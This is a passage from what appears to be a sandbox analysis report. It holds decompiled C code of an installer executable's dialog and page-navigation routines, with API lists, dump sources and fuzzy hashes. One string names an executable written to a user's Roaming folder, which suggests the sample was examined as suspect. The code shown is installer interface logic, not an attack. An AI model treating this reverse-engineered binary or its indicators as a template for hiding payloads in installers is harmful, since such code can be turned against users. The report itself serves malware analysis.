                            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                            											SendMessageW(_v8, 0x113f, 0,  &_v76);
                            										}
                            										_v24 = _v24 + 1;
                            										_t292 =  &(_t292[0x206]);
                            									} while (_v24 <  *0x434f2c);
                            									goto L86;
                            								} else {
                            									_t293 = E004012E2( *0x42d260);
                            									E00401299(_t293);
                            									_t222 = 0;
                            									_t301 = 0;
                            									if(_t293 <= 0) {
                            										L74:
                            										SendMessageW(_v12, 0x14e, _t301, 0);
                            										_a16 = _t293;
                            										_a8 = 0x420;
                            										goto L75;
                            									} else {
                            										goto L71;
                            									}
                            									do {
                            										L71:
                            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                            											_t301 = _t301 + 1;
                            										}
                            										_t222 = _t222 + 1;
                            									} while (_t222 < _t293);
                            									goto L74;
                            								}
                            							}
                            						}
                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                            							goto L93;
                            						} else {
                            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                            							if(_t232 == 0xffffffff) {
                            								goto L93;
                            							}
                            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                            								_t294 = 0x20;
                            							}
                            							E00401299(_t294);
                            							SendMessageW(_a4, 0x420, 0, _t294);
                            							_a12 = _a12 | 0xffffffff;
                            							_a16 = 0;
                            							_a8 = 0x40f;
                            							goto L56;
                            						}
                            					}
                            				} else {
                            					_v36 = 0;
                            					_v20 = 2;
                            					 *0x434f60 = _t291;
                            					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                            					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                            					 *0x42d254 =  *0x42d254 | 0xffffffff;
                            					_t297 = _t258;
                            					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                            					 *0x42d24c = _t260;
                            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                            					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                            					}
                            					DeleteObject(_t297);
                            					_t298 = 0;
                            					do {
                            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                            							if(_t298 != 0x20) {
                            								_v20 = 0;
                            							}
                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                            						}
                            						_t298 = _t298 + 1;
                            					} while (_t298 < 0x21);
                            					_t299 = _a16;
                            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                            					_push(0x15);
                            					E00404499(_a4);
                            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                            					_push(0x16);
                            					E00404499(_a4);
                            					_t300 = 0;
                            					_v16 = 0;
                            					if( *0x434f2c <= 0) {
                            						L19:
                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                            						goto L20;
                            					} else {
                            						_t319 = _v24 + 8;
                            						_v32 = _t319;
                            						do {
                            							_t278 =  &(_t319[0x10]);
                            							if( *_t278 != 0) {
                            								_v64 = _t278;
                            								_t279 =  *_t319;
                            								_v88 = _v16;
                            								_t311 = 0x20;
                            								_v84 = 0xffff0002;
                            								_v80 = 0xd;
                            								_v68 = _t311;
                            								_v44 = _t300;
                            								_v72 = _t279 & _t311;
                            								if((_t279 & 0x00000002) == 0) {
                            									if((_t279 & 0x00000004) == 0) {
                            										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88); // TVM_INSERTITEMW: plain item, keep its HTREEITEM
                            									} else {
                            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16); // flag 0x4: TVM_GETNEXTITEM with TVGN_PARENT (3), close the current group
                            									}
                            								} else {
                            									_v80 = 0x4d;              // flag 0x2: group header, mask |= TVIF_CHILDREN
                            									_v48 = 1;                 // cChildren = 1
                            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88); // TVM_INSERTITEMW
                            									_v36 = 1;                 // at least one group node exists (checked after the loop)
                            									 *( *0x42d260 + _t300 * 4) = _t284;
                            									_v16 =  *( *0x42d260 + _t300 * 4); // the new group becomes hParent for the items that follow
                            								}
                            							}
                            							_t300 = _t300 + 1;
                            							_t319 =  &(_v32[0x818]);
                            							_v32 = _t319;
                            						} while (_t300 <  *0x434f2c);
                            						if(_v36 != 0) {
                            							L20:
                            							if(_v20 != 0) {
                            								E004044CE(_v8);
                            								goto L23;
                            							} else {
                            								ShowWindow(_v12, 5); // SW_SHOW
                            								E004044CE(_v12);     // moves dialog focus (subcall sends WM_NEXTDLGCTL, 0x28)
                            								L93:
                            								return E00404500(_a8, _a12, _a16);
                            							}
                            						}
                            						goto L19;
                            					}
                            				}
                            			}
                            Instruction address column for the C-code above (0x00404F0D to 0x00405510), detached from its code lines during extraction.


                            APIs
                            • GetDlgItem.USER32 ref: 00404F1E
                            • GetDlgItem.USER32 ref: 00404F29
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                            • LoadImageW.USER32 ref: 00404F8A
                            • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                            • DeleteObject.GDI32(00000000), ref: 00405000
                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                            • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                            • ShowWindow.USER32(?,00000005), ref: 00405162
                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                            • ImageList_Destroy.COMCTL32(?), ref: 00405330
                            • GlobalFree.KERNEL32 ref: 00405340
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                            • ShowWindow.USER32(?,00000000), ref: 004054EA
                            • GetDlgItem.USER32 ref: 004054F5
                            • ShowWindow.USER32(00000000), ref: 004054FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                            • String ID: $M$N
                            • API String ID: 2564846305-813528018
                            • Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                            • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                            • Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                            • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                            Uniqueness
                            • Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                            				struct HWND__* _v28;
                            				void* _v84;
                            				void* _v88;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t34;
                            				signed int _t36;
                            				signed int _t38;
                            				struct HWND__* _t48;
                            				signed int _t67;
                            				struct HWND__* _t73;
                            				signed int _t86;
                            				struct HWND__* _t91;
                            				signed int _t99;
                            				int _t103;
                            				signed int _t117;
                            				int _t118;
                            				int _t122;
                            				signed int _t124;
                            				struct HWND__* _t127;
                            				struct HWND__* _t128;
                            				int _t129;
                            				intOrPtr _t130;
                            				long _t133;
                            				int _t135;
                            				int _t136;
                            				void* _t137;
                            
                            				_t130 = _a8;
                            				if(_t130 == 0x110 || _t130 == 0x408) { // WM_INITDIALOG (0x110) or WM_USER+8 (0x408, installer-private page change)
                            					_t34 = _a12;
                            					_t127 = _a4;
                            					__eflags = _t130 - 0x110;
                            					 *0x42d250 = _t34;
                            					if(_t130 == 0x110) {
                            						 *0x434f08 = _t127;
                            						 *0x42d264 = GetDlgItem(_t127, 1); // IDOK
                            						_t91 = GetDlgItem(_t127, 2);      // IDCANCEL
                            						_push(0xffffffff);
                            						_push(0x1c);
                            						 *0x42b230 = _t91;
                            						E00404499(_t127);
                            						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8); // GCL_HICON (-14): set the dialog class icon
                            						 *0x433ecc = E0040140B(4);
                            						_t34 = 1;
                            						__eflags = 1;
                            						 *0x42d250 = 1;
                            					}
                            					_t124 =  *0x40a368; // 0xffffffff
                            					_t136 = 0;
                            					_t133 = (_t124 << 6) +  *0x434f20;
                            					__eflags = _t124;
                            					if(_t124 < 0) {
                            						L36:
                            						E004044E5(0x40b);
                            						while(1) {
                            							_t36 =  *0x42d250;
                            							 *0x40a368 =  *0x40a368 + _t36;
                            							_t133 = _t133 + (_t36 << 6);
                            							_t38 =  *0x40a368; // 0xffffffff
                            							__eflags = _t38 -  *0x434f24;
                            							if(_t38 ==  *0x434f24) {
                            								E0040140B(1);
                            							}
                            							__eflags =  *0x433ecc - _t136;
                            							if( *0x433ecc != _t136) {
                            								break;
                            							}
                            							__eflags =  *0x40a368 -  *0x434f24; // 0xffffffff
                            							if(__eflags >= 0) {
                            								break;
                            							}
                            							_t117 =  *(_t133 + 0x14);
                            							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                            							_push(0xfffffc19);
                            							E00404499(_t127);
                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                            							_push(0xfffffc1b);
                            							E00404499(_t127);
                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                            							_push(0xfffffc1a);
                            							E00404499(_t127);
                            							_t48 = GetDlgItem(_t127, 3);
                            							__eflags =  *0x434f8c - _t136;
                            							_v28 = _t48;
                            							if( *0x434f8c != _t136) {
                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                            								__eflags = _t117;
                            							}
                            							ShowWindow(_t48, _t117 & 0x00000008);
                            							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                            							E004044BB(_t117 & 0x00000002);
                            							_t118 = _t117 & 0x00000004;
                            							EnableWindow( *0x42b230, _t118);
                            							__eflags = _t118 - _t136;
                            							if(_t118 == _t136) {
                            								_push(1);      // MF_GRAYED
                            							} else {
                            								_push(_t136);  // MF_ENABLED
                            							}
                            							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??); // SC_CLOSE follows the IDCANCEL button's enabled state
                            							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1); // BM_SETSTYLE: BS_PUSHBUTTON, redraw
                            							__eflags =  *0x434f8c - _t136;
                            							if( *0x434f8c == _t136) {
                            								_push( *0x42d264);
                            							} else {
                            								SendMessageW(_t127, 0x401, 2, _t136);
                            								_push( *0x42b230);
                            							}
                            							E004044CE();
                            							E0040653D(0x42d268, E00403F7B());
                            							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                            							SetWindowTextW(_t127, 0x42d268);
                            							_push(_t136);
                            							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                            							__eflags = _t67;
                            							if(_t67 != 0) {
                            								continue;
                            							} else {
                            								__eflags =  *_t133 - _t136;
                            								if( *_t133 == _t136) {
                            									continue;
                            								}
                            								__eflags =  *(_t133 + 4) - 5;
                            								if( *(_t133 + 4) != 5) {
                            									DestroyWindow( *0x433ed8);
                            									 *0x42c240 = _t133;
                            									__eflags =  *_t133 - _t136;
                            									if( *_t133 <= _t136) {
                            										goto L60;
                            									}
                            									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // inner page dialog; dialog proc taken from the table at 0x40a36c, indexed by the page type at *(_t133 + 4)
                            									__eflags = _t73 - _t136;
                            									 *0x433ed8 = _t73;
                            									if(_t73 == _t136) {
                            										goto L60;
                            									}
                            									_push( *((intOrPtr*)(_t133 + 0x2c)));
                            									_push(6);
                            									E00404499(_t73);
                            									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10); // rect of control id 0x3fa (1018) in the parent
                            									ScreenToClient(_t127, _t137 + 0x10);
                            									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15); // 0x15 = SWP_NOSIZE | SWP_NOZORDER | SWP_NOACTIVATE
                            									_push(_t136);
                            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                            									__eflags =  *0x433ecc - _t136;
                            									if( *0x433ecc != _t136) {
                            										goto L63;
                            									}
                            									ShowWindow( *0x433ed8, 8); // SW_SHOWNA
                            									E004044E5(0x405);
                            									goto L60;
                            								}
                            								__eflags =  *0x434f8c - _t136;
                            								if( *0x434f8c != _t136) {
                            									goto L63;
                            								}
                            								__eflags =  *0x434f80 - _t136;
                            								if( *0x434f80 != _t136) {
                            									continue;
                            								}
                            								goto L63;
                            							}
                            						}
                            						DestroyWindow( *0x433ed8);
                            						 *0x434f08 = _t136;
                            						EndDialog(_t127,  *0x42ba38);
                            						goto L60;
                            					} else {
                            						__eflags = _t34 - 1;
                            						if(_t34 != 1) {
                            							L35:
                            							__eflags =  *_t133 - _t136;
                            							if( *_t133 == _t136) {
                            								goto L63;
                            							}
                            							goto L36;
                            						}
                            						_push(0);
                            						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                            						__eflags = _t86;
                            						if(_t86 == 0) {
                            							goto L35;
                            						}
                            						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                            						__eflags =  *0x433ecc;
                            						return 0 |  *0x433ecc == 0x00000000;
                            					}
                            				} else {
                            					_t127 = _a4;
                            					_t136 = 0;
                            					if(_t130 == 0x47) { // WM_WINDOWPOSCHANGED
                            						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13); // 0x13 = SWP_NOSIZE | SWP_NOMOVE | SWP_NOACTIVATE
                            					}
                            					_t122 = _a12;
                            					if(_t130 != 5) { // WM_SIZE
                            						L8:
                            						if(_t130 != 0x40d) { // WM_USER+13
                            							__eflags = _t130 - 0x11;
                            							if(_t130 != 0x11) { // WM_QUERYENDSESSION
                            								__eflags = _t130 - 0x111;
                            								if(_t130 != 0x111) { // WM_COMMAND
                            									goto L28;
                            								}
                            								_t135 = _t122 & 0x0000ffff; // LOWORD(wParam): control id
                            								_t128 = GetDlgItem(_t127, _t135);
                            								__eflags = _t128 - _t136;
                            								if(_t128 == _t136) {
                            									L15:
                            									__eflags = _t135 - 1;
                            									if(_t135 != 1) { // IDOK
                            										__eflags = _t135 - 3;
                            										if(_t135 != 3) {
                            											_t129 = 2; // IDCANCEL
                            											__eflags = _t135 - _t129;
                            											if(_t135 != _t129) {
                            												L27:
                            												SendMessageW( *0x433ed8, 0x111, _t122, _a16); // forward the WM_COMMAND to the inner page dialog
                            												goto L28;
                            											}
                            											__eflags =  *0x434f8c - _t136;
                            											if( *0x434f8c == _t136) {
                            												_t99 = E0040140B(3);
                            												__eflags = _t99;
                            												if(_t99 != 0) {
                            													goto L28;
                            												}
                            												 *0x42ba38 = 1;
                            												L23:
                            												_push(0x78);
                            												L24:
                            												E00404472();
                            												goto L28;
                            											}
                            											E0040140B(_t129);
                            											 *0x42ba38 = _t129;
                            											goto L23;
                            										}
                            										__eflags =  *0x40a368 - _t136; // 0xffffffff
                            										if(__eflags <= 0) {
                            											goto L27;
                            										}
                            										_push(0xffffffff);
                            										goto L24;
                            									}
                            									_push(_t135);
                            									goto L24;
                            								}
                            								SendMessageW(_t128, 0xf3, _t136, _t136);
                            								_t103 = IsWindowEnabled(_t128);
                            								__eflags = _t103;
                            								if(_t103 == 0) {
                            									L63:
                            									return 0;
                            								}
                            								goto L15;
                            							}
                            							SetWindowLongW(_t127, _t136, _t136);
                            							return 1;
                            						}
                            						DestroyWindow( *0x433ed8);
                            						 *0x433ed8 = _t122;
                            						L60:
                            						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                            							ShowWindow(_t127, 0xa);
                            							 *0x42f268 = 1;
                            						}
                            						goto L63;
                            					} else {
                            						asm("sbb eax, eax");
                            						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                            							L28:
                            							return E00404500(_a8, _t122, _a16);
                            						} else {
                            							ShowWindow(_t127, 4);
                            							goto L8;
                            						}
                            					}
                            				}
                            			}

                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                            • ShowWindow.USER32(?), ref: 00403FF6
                            • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                            • ShowWindow.USER32(?,00000004), ref: 00404021
                            • DestroyWindow.USER32 ref: 00404035
                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                            • GetDlgItem.USER32 ref: 0040406D
                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                            • IsWindowEnabled.USER32(00000000), ref: 00404088
                            • GetDlgItem.USER32 ref: 00404133
                            • GetDlgItem.USER32 ref: 0040413D
                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                            • GetDlgItem.USER32 ref: 0040424E
                            • ShowWindow.USER32(00000000,?), ref: 0040426F
                            • EnableWindow.USER32(?,?), ref: 00404281
                            • EnableWindow.USER32(?,?), ref: 0040429C
                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                            • EnableMenuItem.USER32 ref: 004042B9
                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                            • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                            • ShowWindow.USER32(?,0000000A), ref: 00404456
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                            • String ID:
                            • API String ID: 1860320154-0
                            • Opcode ID: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
                            • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                            • Opcode Fuzzy Hash: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
                            • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                            				intOrPtr _v8;
                            				int _v12;
                            				void* _v16;
                            				struct HWND__* _t56;
                            				signed int _t75;
                            				signed short* _t76;
                            				signed short* _t78;
                            				long _t92;
                            				int _t103;
                            				signed int _t110;
                            				intOrPtr _t113;
                            				WCHAR* _t114;
                            				signed int* _t116;
                            				WCHAR* _t117;
                            				struct HWND__* _t118;
                            
                            				if(_a8 != 0x110) {
                            					if(_a8 != 0x111) {
                            						L13:
                            						if(_a8 != 0x4e) {
                            							if(_a8 == 0x40b) {
                            								 *0x42b234 =  *0x42b234 + 1;
                            							}
                            							L27:
                            							_t114 = _a16;
                            							L28:
                            							return E00404500(_a8, _a12, _t114);
                            						}
                            						_t56 = GetDlgItem(_a4, 0x3e8);
                            						_t114 = _a16;
                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                            							_v12 = _t103;
                            							_v16 = _t113;
                            							_v8 = 0x432ea0;
                            							if(_t103 - _t113 < 0x800) {
                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                            								SetCursor(LoadCursorW(0, 0x7f02));
                            								_push(1);
                            								E00404907(_a4, _v8);
                            								SetCursor(LoadCursorW(0, 0x7f00));
                            								_t114 = _a16;
                            							}
                            						}
                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                            							goto L28;
                            						} else {
                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                            								SendMessageW( *0x434f08, 0x111, 1, 0);
                            							}
                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                            								SendMessageW( *0x434f08, 0x10, 0, 0);
                            							}
                            							return 1;
                            						}
                            					}
                            					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                            						goto L27;
                            					} else {
                            						_t116 =  *0x42c240 + 0x14;
                            						if(( *_t116 & 0x00000020) == 0) {
                            							goto L27;
                            						}
                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                            						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                            						E004048E3();
                            						goto L13;
                            					}
                            				}
                            				_t117 = _a16;
                            				_t75 =  *(_t117 + 0x30);
                            				if(_t75 < 0) {
                            					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                            				}
                            				_t76 =  *0x434f38 + _t75 * 2;
                            				_t110 =  *_t76 & 0x0000ffff;
                            				_a8 = _t110;
                            				_t78 =  &(_t76[1]);
                            				_a16 = _t78;
                            				_v16 = _t78;
                            				_v12 = 0;
                            				_v8 = E00404609;
                            				if(_t110 != 2) {
                            					_v8 = E004045CF;
                            				}
                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                            				_push(0x22);
                            				E00404499(_a4);
                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                            				_push(0x23);
                            				E00404499(_a4);
                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                            				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                            				_t118 = GetDlgItem(_a4, 0x3e8);
                            				E004044CE(_t118);
                            				SendMessageW(_t118, 0x45b, 1, 0);
                            				_t92 =  *( *0x434f10 + 0x68);
                            				if(_t92 < 0) {
                            					_t92 = GetSysColor( ~_t92);
                            				}
                            				SendMessageW(_t118, 0x443, 0, _t92);
                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                            				 *0x42b234 = 0;
                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                            				 *0x42b234 = 0;
                            				return 0;
                            			}

                            APIs
                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                            • GetDlgItem.USER32 ref: 0040470A
                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                            • GetSysColor.USER32(?), ref: 00404738
                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                            • lstrlenW.KERNEL32(?), ref: 00404759
                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                            • GetDlgItem.USER32 ref: 004047D4
                            • SendMessageW.USER32(00000000), ref: 004047DB
                            • GetDlgItem.USER32 ref: 00404806
                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                            • SetCursor.USER32(00000000), ref: 0040485A
                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                            • SetCursor.USER32(00000000), ref: 00404876
                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                            • String ID: C:\Users\user\AppData\Roaming\34432.exe$N
                            • API String ID: 3103080414-2212789012
                            • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                            • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                            • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                            • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                            				struct tagLOGBRUSH _v16;
                            				struct tagRECT _v32;
                            				struct tagPAINTSTRUCT _v96;
                            				struct HDC__* _t70;
                            				struct HBRUSH__* _t87;
                            				struct HFONT__* _t94;
                            				long _t102;
                            				signed int _t126;
                            				struct HDC__* _t128;
                            				intOrPtr _t130;
                            
                            				if(_a8 == 0xf) {
                            					_t130 =  *0x434f10;
                            					_t70 = BeginPaint(_a4,  &_v96);
